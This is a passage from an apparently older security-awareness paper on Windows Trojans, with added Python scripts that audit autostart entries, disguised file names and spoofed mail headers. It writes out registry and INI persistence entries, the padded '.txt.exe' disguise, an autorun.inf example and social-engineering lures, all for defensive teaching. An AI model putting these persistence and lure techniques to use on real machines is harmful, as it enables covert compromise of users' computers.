- Topic: The Windows Trojans Paper
Links to special detection software are included as well as many other topics never discussed before. This paper is not only intended for the average Internet/Windows user who wants to know how to protect his/her machine from Trojan Horses or just wants to know about their usage, variations, prevention and future, but will also be interesting for the advanced user who wants to read another point of view. Windows Trojans are just a small aspect of Windows Security but you will soon realise how dangerous and destructive they could be while reading the paper.
2.What Is A Trojan Horse?
-----------------------
A Trojan horse is:
- An unauthorised program contained within a legitimate program. This unauthorised program performs functions unknown (and probably unwanted) by the user.
- A legitimate program that has been altered by the placement of unauthorised code within it; this code performs functions unknown (and probably unwanted) by the user.
- Any program that appears to perform a desirable and necessary function but that (because of unauthorised code within it that is unknown to the user) performs functions unknown (and definitely unwanted) by the user.
The Trojan Horse got its name from the old mythical story about how the Greeks gave their enemy a huge wooden horse as a gift during the war. The enemy accepted this gift and they brought it into their kingdom, and during the night, Greek soldiers crept out of the horse and attacked the city, completely overcoming it.
3.How Do Trojans Work?
--------------------
Trojans come in two parts, a Client part and a Server part. When the victim (unknowingly) runs the Server on his/her machine, the attacker then uses the Client to connect to the Server and start using the trojan. TCP/IP is the usual protocol used for communications, but some functions of the trojans use the UDP protocol as well. When the Server is run on the victim's computer, it will (usually) try to hide somewhere on the computer, start listening on some port(s) for incoming connections from the attacker, modify the registry and/or use some other auto-starting method.
It's necessary for the attacker to know the victim's IP address to connect to his/her machine. Many trojans have features like mailing the victim's IP, as well as messaging the attacker via ICQ or IRC. This is used when the victim has a dynamic IP, which means every time you connect to the Internet you get a different IP (most of the dial-up users have this). ADSL users have static IPs so the infected IP is always known to the attacker and this makes it considerably easier to connect to your machine.
Most of the trojans use Auto-Starting methods so even when you shut down your computer they're able to restart and again give the attacker access to your machine. New auto-starting methods and other tricks are discovered all the time. The variety starts from "joining" the trojan into some executable file you use very often, like explorer.exe, for example, and goes to the known methods like modifying the system files or the Windows Registry. System files are located in the Windows directory and here are short explanations of their abuse by the attackers:
- Autostart Folder
The Autostart folder is located in C:\Windows\Start Menu\Programs\startup and as its name suggests, automatically starts everything placed there.
- Win.ini
Windows system file using load=Trojan.exe and run=Trojan.exe to execute the Trojan
- System.ini
Using Shell=Explorer.exe trojan.exe results in execution of every file after Explorer.exe
- Wininit.ini
Setup-Programs use it mostly; once run, it's being auto-deleted, which is very handy for trojans to restart
- Winstart.bat
Acting as a normal bat file trojan is added as @trojan.exe to hide its execution from the user
- Autoexec.bat
It's a DOS auto-starting file and it's used as auto-starting method like this -> c:\Trojan.exe
- Config.sys
Could also be used as an auto-starting method for trojans
- Explorer Startup
Is an auto-starting method for Windows 95, 98 and ME: if c:\explorer.exe exists, it will be started instead of the usual c:\Windows\Explorer.exe, which is the common path to the file.
Registry is often used in various auto-starting methods. Here are some known ways:
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run]
"Info"="c:\directory\Trojan.exe"
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce]
"Info"="c:\directory\Trojan.exe"
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices]
"Info"="c:\directory\Trojan.exe"
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce]
"Info"="c:\directory\Trojan.exe"
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
"Info"="c:\directory\Trojan.exe"
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce]
"Info"="c:\directory\Trojan.exe"
- Registry Shell Open
[HKEY_CLASSES_ROOT\exefile\shell\open\command]
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\command]
A key with the value "%1 %*" should be placed there and if there is some executable file placed there, it will be executed each time you open a binary file. It's used like this: trojan.exe "%1 %*"; this would restart the trojan.
- ICQ Net Detect Method
[HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Agent\Apps\]
This key includes all the files that will be executed if ICQ detects an Internet connection. As you can understand, this feature of ICQ is very handy but it's frequently abused by attackers as well.
- ActiveX Component
[HKEY_LOCAL_MACHINE\Software\Microsoft\Active Setup\Installed Components\KeyName]
StubPath=C:\directory\Trojan.exe
These are the most common Auto-Starting methods using Windows system files, and the Windows registry.
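The auto-start locations listed above can be audited offline. The following is an added example, not part of the original paper: it checks a registry export and the two INI files for the entries described in this section. The function names, the `known_good` allowlist and the sample data are assumptions constructed for illustration.

```python
import re

# Registry autostart points named in the paper, lower-cased for comparison.
RUN_SUFFIXES = tuple(
    "\\software\\microsoft\\windows\\currentversion\\" + k
    for k in ("run", "runonce", "runservices", "runservicesonce"))
SHELL_OPEN_SUFFIX = "\\exefile\\shell\\open\\command"
ACTIVE_SETUP = "\\software\\microsoft\\active setup\\installed components\\"
ICQ_APPS = "\\software\\mirabilis\\icq\\agent\\apps"
SHELL_OPEN_DEFAULT = '"%1" %*'  # stock value of the exefile open handler

# "name"="data" or @="data", with \\ and \" escapes as regedit writes them.
ENTRY = re.compile(r'^(@|"(?:[^"\\]|\\.)*")="((?:[^"\\]|\\.)*)"$')


def parse_reg(text):
    """Yield (key, value_name, data) for each string value in a .reg export."""
    key = None
    for line in text.splitlines():
        line = line.strip()
        if line.startswith("[") and line.endswith("]"):
            key = line[1:-1]
            continue
        m = ENTRY.match(line)
        if key and m:
            name = "(Default)" if m.group(1) == "@" else m.group(1)[1:-1]
            yield key, name, re.sub(r"\\(.)", r"\1", m.group(2))


def audit_registry(reg_text, known_good=()):
    """Return findings for the registry autostart points listed in the paper."""
    allowed = {v.lower() for v in known_good}
    findings = []
    for key, name, data in parse_reg(reg_text):
        k = key.lower()
        if k.endswith(SHELL_OPEN_SUFFIX):
            # Anything placed in front of "%1" %* runs on every .exe launch.
            if name == "(Default)" and data != SHELL_OPEN_DEFAULT:
                findings.append(("shell-open-hijack", key, data))
        elif k.endswith(RUN_SUFFIXES) or ICQ_APPS in k or (
                ACTIVE_SETUP in k and name.lower() == "stubpath"):
            if data.lower() not in allowed:
                findings.append(("unreviewed-autostart", key, data))
    return findings


def ini_values(text, section, option):
    """Return every value of option= inside [section], case-insensitively."""
    current, values = None, []
    for line in text.splitlines():
        line = line.strip()
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1].lower()
        elif current == section and "=" in line and not line.startswith(";"):
            name, value = line.split("=", 1)
            if name.strip().lower() == option:
                values.append(value.strip())
    return values


def audit_ini(win_ini, system_ini):
    """Flag load=/run= in win.ini and a modified shell= in system.ini."""
    findings = []
    for option in ("load", "run"):
        for value in ini_values(win_ini, "windows", option):
            if value:
                findings.append(("win.ini-" + option, value))
    for value in ini_values(system_ini, "boot", "shell"):
        if value.lower() != "explorer.exe":
            findings.append(("system.ini-shell", value))
    return findings


# Constructed sample input (not taken from a real machine).
SAMPLE_REG = r'''REGEDIT4

[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run]
"SystemTray"="SysTray.Exe"
"Info"="c:\\directory\\Trojan.exe"

[HKEY_CLASSES_ROOT\exefile\shell\open\command]
@="trojan.exe \"%1\" %*"

[HKEY_LOCAL_MACHINE\Software\Microsoft\Active Setup\Installed Components\KeyName]
"StubPath"="C:\\directory\\Trojan.exe"
'''
SAMPLE_WIN_INI = "[windows]\nload=\nrun=c:\\Trojan.exe\n"
SAMPLE_SYSTEM_INI = "[boot]\nshell=Explorer.exe trojan.exe\n"

if __name__ == "__main__":
    for f in audit_registry(SAMPLE_REG, known_good=("SysTray.Exe",)):
        print(f)
    for f in audit_ini(SAMPLE_WIN_INI, SAMPLE_SYSTEM_INI):
        print(f)
```

Every Run-style entry that is not on the allowlist is reported for review, because the audit cannot decide on its own which programs are legitimate.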
4.Trojans Variations
------------------
There are so many variations out there that it would be hard to list and describe each and every one of them, but most are a combination of the trojan features you will read about below, or have many other functions that are still not, and probably never will be, known to the public.
Remote Access Trojans
These are probably the most publicly used trojans, just because they give the attackers the power to do more things on the victim's machine than the victim can while standing in front of the machine. Most of these trojans are a combination of the other variations you'll read about below. The idea of these trojans is to give the attacker COMPLETE access to someone's machine, and therefore access to files, private conversations, accounting data, etc.
Password Sending Trojans
The purpose of these trojans is to rip all the cached passwords and also look for other passwords you're entering then send them to a specific mail address, without the user noticing anything. Passwords for ICQ, IRC, FTP, HTTP or any other application that require a user to enter a login+password are being sent back to the attacker's e-mail address, which in most cases is located at some free web based e-mail provider. Most of them do not restart when Windows is loaded, as the idea is to gather as much info about the victim's machine as passwords, mIRC logs, ICQ conversations and mail them; but it depends on the needs of the attacker and the specific situation.
Keyloggers
These trojans are very simple. The only thing they do is log the keystrokes of the victim and then let the attacker search for passwords or other sensitive data in the log file. Most of them come with two functions, online and offline recording. Of course they could be configured to send the log file to a specific e-mail address on a daily basis.
Destructive
The only function of these trojans is to destroy and delete files. This makes them very simple and easy to use. They can automatically delete all your core system files (for example: .dll, .ini or .exe files, possibly others) on your machine. The trojan is activated by the attacker or sometimes works like a logic bomb and starts on a specific day and at a specific hour.
Denial Of Service (DoS) Attack Trojans
These trojans are getting very popular these days, giving the attacker the power to start a DDoS, if he/she has enough victims of course. The main idea is that if you have 200 ADSL users infected and start attacking the victim simultaneously, this will generate a LOT of traffic (more than the victim's bandwidth, in most cases) and the victim's access to the Internet will be shut down. WinTrinoo is a DDoS tool that has become really popular recently, and if the attacker has infected many ADSL users, major Internet sites could be shut down as a result, as we've seen happen in the past few months.
Another variation of a DoS trojan is the mail-bomb trojan, whose main aim is to infect as many machines as possible and simultaneously attack specific e-mail address/addresses with random subjects and contents which cannot be filtered.
Proxy/Wingate Trojans
An interesting feature implemented in many trojans is turning the victim's computer into a proxy/wingate server available to the whole world or to the attacker only. It's used for anonymous Telnet, ICQ, IRC, etc., and also to register domains with stolen credit cards and for many other illegal activities. This gives the attacker complete anonymity and the chance to do everything from YOUR computer, and if he/she gets caught the trace leads back to you.
FTP Trojans
These trojans are probably the most simple ones and are kind of outdated, as the only thing they do is open port 21 (the port for FTP transfers) and let EVERYONE, or just the attacker, connect to your machine. Newer versions are password protected so only the one that infected you may connect to your computer.
Software Detection Killers
There are such functionalities built into some trojans, but there are also separate programs that will kill ZoneAlarm, Norton Anti-Virus and many other (popular anti-virus/firewall) programs that protect your machine. When they are disabled, the attacker will have full access to your machine, to perform some illegal activity, use your computer to attack others and often disappear. Even though you may notice that these programs are not working or functioning properly, it will take you some time to remove the trojan, install the new software, configure it and get back online with some sense of security.
I would like you to look at a list created by SnakeByte (nice work dude!):
http://www.snake-basket.de/e/AV.txt
Check it out and you will get my point how easily these programs could be disabled. It's a list of Anti-Virus detection software with its Window Names, associated files and many more things that attackers found as a way to disable certain protection software. I've seen only several anti-trojan packages that let the user specify another location of the program (installation) files, different from the default one, also Window names and many other features that will make it harder for the attacker to disable the software.
5.The Future Of Windows Trojans
-----------------------------
Windows users will always be targets of malicious attackers because most of them don't know the real meaning of the word security, and think that some firewall is the only solution they need for protection, but they actually don't have a clue how it works or how to configure it properly. Windows Trojans will be a big security problem in the future and I'm sure attackers realise that, and many more unique functions will be implemented into their trojans but will mostly be used for the attacker's private purposes. Programmable or scriptable "automated hacking" functions will be used to solve various attacker's problems, starting from anonymous port scanning and going up to Distributed Denial Of Service (DDoS) attacks. A recommended resource related to the subject is
http://staff.washington.edu/dittrich/misc/ddos/
How about distributed cracking of password files like on all of these contests around the world but in that case a network created by attacker/attackers for their own purposes? Has anyone ever thought of "spamming" function, built into trojans, similar to all of these spam programs out there, crawling around the Internet, searching for e-mails? And these are just small examples, but trust me, there are much more advanced features, built into Windows Trojans, that probably will never be released to the public.
At this year's Defcon the security company SensePost gave a demonstration of a trojan called Setiri, bypassing all the firewalls and IDSs and giving access to the attacker even though the machine was in a restricted environment. More info is available at:
http://www.computercops.biz/modules.php?name=News&file=article&sid=1321
6.How Can I Get Infected?
-----------------------
A lot of people out there can't tell the various ways of infection apart, just because in their minds the only way of getting infected is by downloading and running server.exe, and they say they will never do that. As you'll read here, there are many more ways for malicious attackers to infect your machine and start using it for illegal activities. Please take all of these topics I'm reviewing here really seriously; read them carefully and remember that prevention is way better than the cure!
6.1 ICQ
6.2 IRC
6.3 Attachments
6.4 Physical Access
6.5 Browser And E-mail Software Bugs
6.6 Netbios(FileSharing)
6.1 Via ICQ
People don't understand that they can also get infected while talking via ICQ or any other Instant Messenger Application. It's all risky when it's about receiving files no matter from who, and no matter from where.
Believe it or not, there are still guys out there using really old versions of ICQ, and it's all because they can see the IP of the person they're talking to. The older versions of ICQ had such functionality and it was useful for everyone capable of using winnuke and other DoS tools, but really, how hard is it to click with the mouse? These people are often potential victims of someone that is more knowledgeable on Windows trojans and takes advantage of their old ICQ versions.
Let's review various ways of getting infected via ICQ:
- You can never be 100% sure who's on the other side of the computer at the particular moment. It could be someone that hacked your friend's ICQ UIN (Unique Identification Number) and wants to spread some trojans over his/her friends. You'll definitely trust your best dude Bob if he offers you something interesting, but is it really Bob on the other side?
- Old versions of ICQ had bugs in the WebServer feature, that creates a site on your computer, with your info from the ICQ database. The bug consists in that the attacker can have access to EVERY file on your machine and if you read the previous sections carefully and know the auto-start methods, you'll probably realise what could happen if someone has access to your win.ini or other system file, namely a trojan installed in a few minutes.
- Trojan.exe is renamed like Trojan....(150 spaces).txt.exe, icon changed to a real .txt file and this will definitely get you infected. This bug must be fixed in the newer versions for sure.
No matter which Instant Messenger Application you're using, you could always get yourself infected through some program bug you never had the chance to hear about because you never took care of checking for newer versions of the application. Also, when it's about receiving files, no matter from where and no matter from whom, take that very seriously and realise the dangers of your naivety.
6.2 Via IRC
So many people LIVE on IRC and this is another place where you can get yourself infected. Trust is vital no matter what you're doing. No matter who is sending you files, and whether they pretend to be a free porn archive, software for "free internet" or a Hotmail hacking program, DO NOT get any of these files. Newbies are often targets of these fakes, and believe me, many people are still newbies about their security. Users get infected from porn-trade channels, and, of course, warez channels, as they don't think about the risk, but about how to get free porn and free programs instead.
Here are several scenarios of you getting infected while using IRC:
- You're talking with someone, a "girl" probably, have great time and, of course, you want to see the person you're talking to. You ask for a picture or the "girl" offers you her pictures and I'm sure you'll definitely want to see them. The "girl" says that she has just created her first screensaver, using some known free or commercial software to do this, and offers it to you, but how about if "she" mentions several pictures are naked ones?! You have been talking to "her" for a week or so, you get this screensaver.exe, you run it and, yeah, VERY nice pics, some are naked and she didn't lie to you so nothing bad or suspicious has happened BUT think again what really has happened!
- Trojan.exe could also be renamed into Trojan.scr like a screensaver extension and will again run properly when you execute it so pay attention about these file extensions.
- Trojan.exe is renamed to something like Trojan....(150 spaces).txt.exe. You'll get the file over IRC via DCC, it will appear as .TXT and you won't get worried about anything, so you run it and get yourself infected again. In all of these examples the icon of the file is changed, of course, because it needs to be the same icon as a normal .TXT, and this fools victims very often.
Most people don't notice in their Explorer that the Type of the file is Application BUT with a .TXT icon. So BEFORE you run something, even if it's with a .TXT icon, check its extension and make sure it's really a text file.
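The extension checks recommended here and in section 6.1 can be automated before a received file is opened. This is an added example, not code from the original paper; the extension lists and the `PAD_RUN` threshold are assumptions chosen for illustration.

```python
import os

# Extensions Windows executes on double-click, and data types used as decoys.
EXECUTABLE_EXTS = {".exe", ".scr", ".com", ".bat", ".pif"}
DECOY_EXTS = {".txt", ".jpg", ".gif", ".doc", ".mp3"}
PAD_RUN = 8  # assumption: this many consecutive spaces only occurs as padding


def inspect_filename(name):
    """Return the reasons a received file name deserves suspicion."""
    reasons = []
    # Keep only the file name, whichever path separator the sender used.
    base = os.path.basename(name.replace("\\", "/"))
    stem, ext = os.path.splitext(base.rstrip())
    ext = ext.lower()
    if ext in EXECUTABLE_EXTS:
        reasons.append("executable extension " + ext)
        # A data-looking extension in front of the real one is the
        # "appears as .TXT" trick: the visible part ends in .txt.
        inner = os.path.splitext(stem.rstrip())[1].lower()
        if inner in DECOY_EXTS:
            reasons.append("decoy extension " + inner + " before " + ext)
    if " " * PAD_RUN in base:
        reasons.append("long run of spaces pushes the real extension out of view")
    return reasons


if __name__ == "__main__":
    # Constructed sample names.
    samples = [
        "Trojan" + " " * 150 + ".txt.exe",
        "notes.txt" + " " * 150 + ".exe",
        "Trojan.scr",
        "readme.txt",
    ]
    for s in samples:
        print(repr(s[:12] + "..."), inspect_filename(s))
```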
6.3 Via Attachments
I'm always amazed how many people got themselves infected by an attachment sent to their mailboxes. Most of these users are new to the Internet and are pretty naive. When they receive a mail containing an attachment, saying they will get free porn, free Internet access etc., they run it without completely understanding the risks for their machines. Check the following scenario: you know your friend Alex is a very skilled Visual Basic programmer. You also know he's coding his latest program but you're curious what it is all about, and you wait for an e-mail from him with the attachment when he finishes coding the application. Yeah, but the person targeting YOU also knows that. The attacker also knows your friend's e-mail address. Then the attacker will simply code some program or get some freeware one, use some relaying mail server to fake the e-mail's FROM field and make it look like your friend's one; Alex's e-mail address is alex@example.com so the attacker's FROM field will be changed to alex@example.com and, of course, it will include the TROJANED attachment... You'll check your mail, see that Alex finally got his program ready and sent it, you'll download and run it without thinking that it might be a trojan or something else, because, hey, Alex wouldn't do something like that to me, he's my friend, and you'll get yourself infected.
Information Is Power! Just because the attacker knew you were waiting for some particular file, he found Alex's e-mail address and got you infected... choosing the right moment is what matters here. And it all happened just because you were naive, just because you saw alex@example.com in the FROM field, and just because you didn't check the mail headers to see that the mail came from some .jp mail server that relays e-mails and has been used by spammers for several months.
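The header check described above can be scripted. The following is an added example, not part of the original paper: it compares the domain in the FROM field with the host that actually handed the message to your own mail server. The message, the host names and the Postfix-style `Received` layout are constructed assumptions, and a mismatch is a heuristic signal, since legitimate mail can also pass through third-party servers.

```python
import re
from email import message_from_string
from email.utils import parseaddr

# "from HELO (rdns [ip]) ... by HOST" as written by Postfix-style servers.
HOP = re.compile(
    r"\bfrom\s+(\S+)(?:\s+\((\S+)\s+\[([^\]]+)\]\))?.*?\bby\s+(\S+)",
    re.I | re.S)


def received_hops(msg):
    """Return (sending_host, ip, stamping_host) per hop, newest first."""
    hops = []
    for raw in msg.get_all("Received", []):
        m = HOP.search(raw)
        if m:
            helo, rdns, ip, by = m.groups()
            # Prefer the name the receiving server looked up over the
            # HELO name, which the sender chooses freely.
            host = rdns if rdns and rdns != "unknown" else helo
            hops.append((host.lower(), ip, by.lower().rstrip(";")))
    return hops


def check_sender(raw_message, own_mx_suffix):
    """Compare the From domain with the host that delivered to our server."""
    msg = message_from_string(raw_message)
    from_domain = parseaddr(msg.get("From", ""))[1].rpartition("@")[2].lower()
    handed_over_by = None
    # Only the unbroken run of hops stamped by our own servers is
    # trustworthy; anything below it may have been written by the sender.
    for host, _ip, stamped_by in received_hops(msg):
        if not stamped_by.endswith(own_mx_suffix):
            break
        handed_over_by = host
    matches = bool(from_domain) and handed_over_by is not None and (
        handed_over_by == from_domain
        or handed_over_by.endswith("." + from_domain))
    return {"from_domain": from_domain,
            "handed_over_by": handed_over_by,
            "suspicious": not matches}


# Constructed message illustrating the relay scenario from the text.
SAMPLE = """\
Received: from relay.example.jp (relay.example.jp [203.0.113.25])
\tby mx.victim.example with SMTP; Mon, 01 Jan 2001 10:00:02 +0000
Received: from dialup-17 (unknown [198.51.100.7])
\tby relay.example.jp with SMTP; Mon, 01 Jan 2001 10:00:00 +0000
From: Alex <alex@example.com>
To: you@victim.example
Subject: my new program

See attachment.
"""

if __name__ == "__main__":
    print(check_sender(SAMPLE, "victim.example"))
```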
Many people got themselves infected by the famous "Microsoft Internet Explorer Update" sent directly to their mailboxes by the nonexistent Microsoft Updates Staff. I understand you felt great because Microsoft are paying attention especially to you, and sent you the latest updates, but these "updates" are definitely trojans. Microsoft will NEVER send you updates of their software via e-mail, no matter that you see the FROM field is updates@microsoft.com; as you've noticed in the previous example, the FROM field could be and IS faked. If you ever notice some mail in your mailbox with subjects like "Microsoft IE Update" and such, delete it WITHOUT viewing or reading the e-mail, because some E-Mail clients like Outlook Express and others have bugs that automatically execute the file attached to the e-mail WITHOUT you even touching it. As you can imagine, this is an extremely dangerous problem that requires you to be always up to date with the latest version of any software you're using.
6.4 Physical Access
Physical access is vital for your computer's security. Imagine what an attacker can do while having physical access to your machine, and let's not mention if you're always connected to the Internet and leave the room for several minutes... long enough to get you infected. Here I'll point out several scenarios, often used by attackers to infect your computer while they're having physical access to your machine. There are some very smart people out there that keep thinking of new ways of getting physical access to someone's computer. Here are some tricks that are interesting:
- Your "friend" wants to infect you with a trojan and he/she has physical access to your machine. Let's say you were at home surfing the net, chatting or whatever. Suddenly your "friend" asks you for a glass of water, knowing that you'll go in another room and will be away for 1 or 2 minutes. While you do that he/she takes a diskette out of his/her pocket and infects your unprotected PC. You come back and everything is OK because your "friend" is doing exactly the same thing as before you left... surfing the net.
- The next example is when 2 guys want to take revenge on you because of something and are supporting each other to accomplish the task. Again you are at home with your "friend", surfing, chatting, whatever you're doing; suddenly the telephone rings and a "friend" of yours wants to speak with you about something that is really important. He/she (it's better to be she in this case) asks "Is there anyone around you? If so, please move somewhere away from him/her (after knowing it is him or her, of course). I don't want anyone to listen to what I'm going to tell you". The victim is again lured away from the computer, leaving the attacker to do whatever he/she wants on the target computer.
- Other approaches like the previous ones might be a sudden ring on the bell, as well as other variations of phone calls and conversations leaving the attacker alone with the victim's computer. There are so many other possible approaches; just think for a while and you'll see what I mean and how easily you could be tricked, and it's because you're not suspicious enough when it is about your sensitive computer data.
- Another way of infecting while having physical access is the Auto-Starting CD function. You've probably noticed that when you place a CD in your CDROM, it automatically starts with some setup interface; here's an example of the Autorun.inf file that is placed on such CD's:
[autorun]
open=setup.exe
icon=setup.exe
So you can imagine that while running the real setup program a trojan could be run VERY easily, and as most of you probably don't know about this CD function they will get infected and won't understand what happened and how it's been done. Yeah, I know it's convenient to have the setup.exe autostart but security is what really matters here, that's why you should turn off the Auto-Start functionality by doing the following:
Start Button->Settings->Control Panel->System-> Device Manager->CDROM->Properties->Settings
and there you'll see a reference to Auto Insert Notification. Turn it off and you won't have any problems with that function anymore.
I know MANY other variations of physical access infections but these are the most common ones so pay attention and try to make up several more by yourself.
When the victim IS connected to the Internet:
Here we have many variations; again, I'll mention the most common ones. While the attacker is having physical access he/she may download the trojan.exe, using various ways just by knowing how various Internet protocols work.
- A special IRCbot known only to the attacker is staying in IRC with the only function to DCC the trojan.exe back to the attacker whenever he/she messages the bot with a special command. The victim will probably be away from the computer.
- The attacker wants to download some specific software like new version of some programs infected with trojan(s), of course, and visit some URL, known to him/her only, and download the trojan.
- The attacker pretends he/she wants to check his/her (web based) mail (for example, at Yahoo! or HotMail) but in fact has the trojan.exe stored in his/her mailbox and just downloads and executes the file, hereby infecting the computer. The mail service is used as a storage area, in this case.
There are many more ways of infecting the victim while connected to the Net, as you can imagine. Any of these examples will succeed but it all depends on the victim's knowledge of the Internet and how advanced his/her skills are, so the attacker needs to check these things somehow before doing any of these activities I pointed here. After that, the attacker will be able to choose the best variant for infecting the victim and doing the job.
6.5 Browser And E-mail Software Bugs
Users do not update their software versions as often as they should, and a lot of the attackers are taking advantage of this well known fact. Imagine you are using an old version of Internet Explorer and you visit a (malicious) site that will check and automatically infect your machine without you downloading or executing any programs. The same scenario goes when you check your E-mail with Outlook Express or some other software with well known problems; again you will be infected without downloading the attachment. Make sure you always have the latest version of your Browser and E-mail Software, and reduce the chances of these variations to a minimum. Here are some links about Browser and E-mail Software bugs; check them out and understand how dangerous these bugs are, and it's all because of you using an old version of the software.
http://www.guninski.com/browsers.html
http://www.guninski.com/netscape.html
6.6 Netbios(File Sharing)
If port 139 on your machine is open, you're probably sharing files and this is another way for someone to access your machine, install trojan.exe and modify some system file, so it will run the next time you restart your PC. Sometimes the attacker may use a DoS (Denial Of Service) attack to shut down your machine and force you to reboot, so the trojan can restart itself immediately. To block file sharing in WinME, go to:
Start->Settings->Control Panel->Network->File And Print Sharing
and uncheck the boxes there. That way you won't have any problems related to Netbios abuse.
7.Fake Programs
-------------
Imagine a Freeware SimpleMail program that's very suitable for your needs, and very handy with its features like an address book, an option to check several POP3 accounts and many other functions that make it even better than your E-mail client, and the best thing for you is that it's free. You use ZoneAlarm or any other similar protection software, and mark the program as a TRUSTED Internet server so none of your programs will ever bother you about that program, as you are using it probably every day because it's working very well, no problems ever occurred, you're happy, but a lot of things are going on in the background. Every mail you send and all your passwords for the POP3 accounts are being mailed directly into the attacker's mailbox without you noticing anything. Cached passwords and your keystrokes could also be mailed, and the idea here is to gather as much info as possible and send it to the attacker. This info includes credit card numbers, passwords for various applications and many other things.
In some cases the attacker may have complete access to your machine but it depends on his/her ideas about the hidden program's functions. When sending e-mails and using port 25 or 110 for POP3, these could be used for connections from the attacker's machine (not at home, of course, but again from another hacked one) to connect and use the hidden functions he/she implemented in the Freeware SimpleMail. The attacker's idea here is to offer you a program that requires a connection to be established with some server; let's say at the top of the SimpleMail there's a banner that's auto-refreshing every few minutes, because the programmer "needs to pay the bills too" as he said in the About section, so nothing seems suspicious to you as it's a normal thing, and your logical conclusion is completely right, as the only way for that guy to keep offering this cool freeware program for free is to use banners. You've already marked the program as TRUSTED so the attacker can have complete access to your machine because he/she fooled you into thinking it's a TRUSTED program. Even if you notice some connection to your machine on some strange port, you won't consider this a suspicious event, as the banners section needs to get these banners from somewhere, and this is the place your machine is connected to all the time to keep them refreshing.
The only thing the attacker needs is creativity, and most of them do have it. Think of a fake AudioGalaxy (software for sharing mp3's) but, of course, with a different name. The attacker would create it, free up 15GB of disk space on his machine and place a large archive of mp3's there... then, of course, the same will be done on several other machines to fool you that you are downloading from other people located all over the world, but it's not necessary, as the program's interface may never show you where you're actually downloading the mp3's from. The software will again be backdoored as in the previous example, and will get thousands of naive users, probably using ADSL connections, infected.
Fake programs that have hidden functions often have professional looking web sites and links to various anti-trojan software mentioned as affiliates, to make you trust the site; a readme.txt is included in the setup, along with many other things to fool you into thinking it's a trusted one. Pay attention to the freeware tools you download; consider them extremely dangerous and a very useful and easy way for attackers to infect your machine with a Trojan.
8.Untrusted Sites And Freeware Software
-------------------------------------
A site located at some free web space provider or just offering some programs for illegal activities can be considered as untrusted one. As you know, there are thousands of "hacking/security" archives on these free web space providers
like Xoom, Tripod, Geocities and many many others. These sites have archives full with "hacking" programs, scanners, mail-bombers, flooders and many other tools. Often several, if not all of these programs are infected by the guy who created the site. It's highly risky to download any of the programs and the
tools located on such untrusted sites; no matter which software you use are, you ready to take the risk? There are some untrusted sites, looking REALLY professional and having huge archives, full with Internet related software, feedback form, links to other popular sites. I think if you take some time,
look deeper, scan all the files you download you can decide on your own whether the site you are downloading your software from is a trusted or an untrusted one.
Software like mIRC, ICQ, PGP or any other popular software MUST be downloaded from its original (or official dedicated mirror site) and not from any of these I told you about. Sometimes such sites claim there's a new version of, let's say, mIRC 7.0, and you know your current version is 6.0 and, yeah, it's
handy to click on the URL and download the .exe in 1 minute and take advantage of the latest version, but will definitely get yourself infected. A possible variation of this method will again be claiming for a new version, BUT the site would include info on nonexistent security bugs, found in the previous
one (which is of course the latest you have), and again it is handy for you to download it, instead of visiting mIRC's main site, and see if there is really an updated version or check for any of these security bugs you've read about on the fake site.
Webmasters of well known Security Portals, that have HUGE archives with various "hacking" programs, should be responsible for the files they provide and OFTEN scan them with Anti-Virus and Anti-Trojan software to guarantee their visitors downloads "free of trojans and viruses". A known method is that attackers send some program created by them, let's say a UDP flooder, to the webmaster as a submission for the archive, but infect the program with some trojan and later have visitors downloading the program and getting themselves infected. Some
attackers may use the webmaster's irresponsibility and infect their files, and have the site distribute the trojan. I know of another story regarding this problem. It's about a Gaming Magazine that used to include a CD with free demo versions of the latest games in each new edition. The editors made a contest
to find new talents and give the people programming games the chance to popularise their productions by sending them to the Editors. An attacker infected his game with a new and private trojan and sent it to the Magazine. In the next edition the "game" appeared on the CD and you can imagine the chaos that set in. And it's all because of the Editors, who did not have much knowledge on the topic, and, as I've told you, in the old days Anti-Virus software was detecting only a small part of the public trojans (and what about all the private ones). In this particular case they were using only an Anti-Virus scanner to protect their readers from such attacks. Webmasters and
everyone having some sort of software archive on his/her portal, MUST scan it very often, and before adding a new file it should be well examined; if it's suspicious in any way, it must be sent to your software detection labs for further analysis. Do care about your visitors/readers if you want them to care about you.
Freeware programs could be considered suspicious and extremely dangerous, due to the fact that it's a very easy and useful way for the attacker to infect your machine with some freeware program. No matter how suitable you find the program, remember that "free is not always the best" and it's very risky to
use any of these programs. My advice is: before using a Freeware program, do search for some reviews on it, check popular search engines, and try to look up some info about it. If you find any reviews written by respected sites, that means they've used and tested it and the chance of infection is thereby
minimised. If no reviews or comments about the software are found via the search engines, then it may be highly risky to start using it.
9.How Are They Detecting My Internet Presence?
--------------------------------------------
People new to the Internet often ask this question as they can't understand why someone will want to attack especially them, because they never did any harm to anyone and never did something that might get them into trouble. While reading the previous sections, I hope you understood that sometimes you only need to visit a web site with your unpatched browser and get yourself infected.
I will explain several scenarios on how attackers may discover your Internet presence:
- When visiting a web page, the attacker might have created a script that will automatically check your Browser for known bugs, and if any are detected, install a trojan on your machine or notify the attacker to have a deeper look. Make sure you're always using the latest version of your Browser for maximal protection. Check for (security) patches and apply these often!
- When joining an IRC channel, an IRC bot might be configured to scan everyone joining for specific trojan ports opened or FileSharing (Netbios) enabled. If the attacker is smart, the script will scan you several minutes after you join the channel and, of course, use an IP number not belonging to anyone in
the channel.
- Attackers often attempt IP blocks scanning, looking for default trojan ports and of course FileSharing (Netbios). After infection, your machine could also be used for such scans, as well as an IRC bot, scanning those joining some big IRC channel full of people.
These are some of the most common ways attackers use to search for new victims, suitable for their illegal activities. If someone is targeting you specifically, the attacker won't be using any of these methods I reviewed above; instead your
Browser version will be found as well as the Operating System you're using, and the attacker will make a personal contact with you via IRC, ICQ, etc., and fool you somehow and get you infected.
10.What Is The Attacker Looking For?
---------------------------------
